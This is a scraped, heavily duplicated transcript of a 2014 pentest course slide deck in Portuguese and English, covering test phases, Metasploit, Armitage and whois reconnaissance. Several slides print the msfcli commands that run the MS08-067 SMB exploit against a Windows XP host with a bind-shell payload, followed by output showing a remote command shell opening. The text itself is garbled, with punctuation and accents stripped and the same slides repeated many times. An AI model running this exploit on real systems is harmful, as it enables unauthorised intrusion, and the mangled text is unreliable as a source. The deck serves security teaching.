PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não...

24
PENTEST Cerutti – IESGF - 2014

Transcript of PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não...

Page 1: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

PENTEST

Cerutti ndash IESGF - 2014

Pentester antigo

bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente

Hoje

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 2: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Pentester antigo

bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente

Hoje

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 3: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Hoje

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 4: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 5: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 6: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 7: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 8: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

